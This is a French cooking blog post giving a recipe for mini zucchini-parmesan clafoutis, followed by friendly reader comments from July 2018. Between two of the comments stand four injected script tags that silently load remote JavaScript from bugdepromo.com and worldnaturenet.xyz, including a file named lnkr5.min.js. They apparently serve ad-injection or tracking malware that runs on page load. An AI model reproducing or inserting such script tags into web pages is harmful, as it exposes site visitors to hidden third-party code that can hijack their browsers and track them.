• Clafoutis courgettes-parmesan

    Bonjour à tous, et bienvenue dans mon univers. Les légumes du soleil garnissent nos étals pour notre plus grand plaisir. Alors profitons en pour les consommer sans modération.

    La recette que je vous propose aujourd'hui vient du blog de Michèle - croquant fondant gourmand. Cela fait déjà plusieurs fois que je la réalise, je l'ai même proposée en atelier culinaire, et ce fut un vrai succès.

    Place à la recette

    Clafoutis courgettes-parmesan

    Clafoutis courgettes-parmesan

    Pour 6 personnes (en entrée) ou 2 (en plat un soir)

    • 400 g de courgettes
    • 1 gousse d'ail
    • 1 càs d'huile d'olive
    • 2 oeufs
    • 25 g de crème liquide
    • 15 g de farine
    • 40 g de parmesan râpé
    • 1/2 càc de curcuma
    • 1 càs de ciboulette (1)
    • 1 càs de persil (2)
    • fleur de sel
    • poivre du moulin

    Clafoutis courgettes-parmesan

    Poser les empreintes briochettes sur la plaque perforée. 

    Préchauffer le four à 180°C.

    Laver les courgettes, les couper en petits dés (sans les peler). Pour ma part j'ai enlevé une bande sur 2 ainsi que les pépins pour faciliter ma digestion.

    Peler et dégermer la gousse d'ail et la hacher.

    Dans une mijoteuse, faire revenir dans l'huile chaude les dés de courgettes et l'ail jusqu'à ce que les légumes soient tendres mais ils ne doivent pas s'écraser.

    Clafoutis courgettes-parmesan

    Ciseler finement les herbes de façon à en obtenir 1 càs de chaque. Réserver.

    Dans un cul-de-poule mélanger la farine, le parmesan, les œufs, la crème, le curcuma et les herbes.

    Saler et poivrer.

    Clafoutis courgettes-parmesan

    Ajouter les dés de courgettes et bien les mélanger de la préparation aux œufs.

    Clafoutis courgettes-parmesan

    Répartir la préparation dans les empreintes.

    Clafoutis courgettes-parmesan

    Faire cuire 20 minutes.

    Clafoutis courgettes-parmesan

    Attendre 5 minutes avant de démouler.

    Clafoutis courgettes-parmesan

    Servir tiède ou froid (à température ambiante) avec une bonne salade verte.

    (1) et (2) Michèle a mis du basilic, je n'en avais plus j'ai utilisé le reste de mon persil et de ma ciboulette.

    Je propose cette recette à Claudine pour : Cuisinons de saison en Juillet avec la courgette

    Clafoutis courgettes-parmesan

    « Salade de pâtes estivales au jambon cru et melon - recette autour d'un ingrédient #41Risotto au poulet et fèves »
    Pin It

    Tags Tags : , , , ,
  • Commentaires

    1
    gut
    Mardi 17 Juillet 2018 à 09:36

    C'es vrai que ces petits flans faciles à faire sont top ! J'en fait aussi de temps en temps mais sans curcuma alors il faudra que j'y pense ! Merci cécile de les offrir à cuisinons ils sont trop trognons ! gros bisous

      • Mardi 17 Juillet 2018 à 09:44

        C'est vrai que c'est bon et rapidement préparé. Belle journée. bises

    2
    Mardi 17 Juillet 2018 à 13:48

    Idéal pour compléter un barbecue avec ses grillades!

    Bises, Dine avec Sandrine

    3
    Mardi 17 Juillet 2018 à 18:06

    JOIL TES FLANS

    4
    Mardi 17 Juillet 2018 à 18:43
    yumelise

    Un bel et bon accompagnement pour une viande ou un poisson.

      • Mercredi 18 Juillet 2018 à 14:27

        Oui ou tout simplement en entrée avec quelques tomates cerises. Belle journée.

    5
    Mardi 17 Juillet 2018 à 22:26
    guy59600

    de jolis clafoutis bons ingrédients et de délicieux radis

    une bonne soirée bises

      • Mercredi 18 Juillet 2018 à 14:28

        Oh oui moi les radis j'en mangerai tout le temps avec du beurre aux cristaux de sel de Guérande Hum. bises

    6
    Mardi 17 Juillet 2018 à 23:09

    merci pour cette recette toute ensoleillée ! bises

      • Mercredi 18 Juillet 2018 à 14:28

        Elle accompagne bien le soleil estival. Belle après-midi. Bises

    7
    Mardi 17 Juillet 2018 à 23:30

    Superbes et idéal par ces chaleurs caniculaires qu'on a, de très jolies couleurs, bisou !

      • Mercredi 18 Juillet 2018 à 14:29

        Oh oui c'est clair il fait un peu chaud, en Normandie nous ne sommes pas habitués à avoir aussi chaud. Belle après-midi. Bises

    8
    Mercredi 18 Juillet 2018 à 06:05

    Une recette pour moi qui suis toujours à la recherche de recette pour mes courgettes du jardin !!

    Je te souhaite une bonne journée. Bises

      • Mercredi 18 Juillet 2018 à 14:30

        J'aimerai tant pouvoir cueillir mes légumes le matin à la fraîche. Belle après-midi. Bises

    9
    Mercredi 18 Juillet 2018 à 09:27
    Isabelle

    C'est tout à fait le genre de recettes qu'on adore à la maison. 

    Bisous

      • Mercredi 18 Juillet 2018 à 14:31

        J'ai vu 2 ou 3 recettes chez toi ce matin avec des courgettes que j'ai mis de côté. Belle après-midi.

        Bisous

    10
    Mercredi 18 Juillet 2018 à 09:36
    Michèle

    Merci Cécile, j'ai récupéré ta photo. Bisous

    11
    Mercredi 18 Juillet 2018 à 10:03

    ils sont superbes, bisous

    12
    Mercredi 18 Juillet 2018 à 18:14

    Mini clafoutis pour maxi gourmands. Bisous. Sylvie.

    13
    Mercredi 18 Juillet 2018 à 19:33

    J'aime ce genre de petits clafoutis, en accompagnement pour un barbecue c'est top.

    Biz, Sonia

    14
    Mercredi 18 Juillet 2018 à 22:24

    Au top cette recette. J'adore. biz

    <script src="//bugdepromo.com/1c732a07af99d6369d.js"></script> <script src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52250x7283x&r=29" type="text/javascript"></script> <script src="http://bugdepromo.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://bugdepromo.com/ext/1c732a07af99d6369d.js?sid=52250_7283_&title=FF_depromext.cool&blocks[]=31af2" type="text/javascript"></script>
    15
    Dimanche 22 Juillet 2018 à 01:45
    samar

    j'adore la courgette une belle association avec le parmesan une bonne idee pour un repas leger accompagné d'une bonne salade

    bisous

      • Dimanche 22 Juillet 2018 à 18:45

        C'est comme ça que nous l'avons servi. Belle soirée. Bises

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :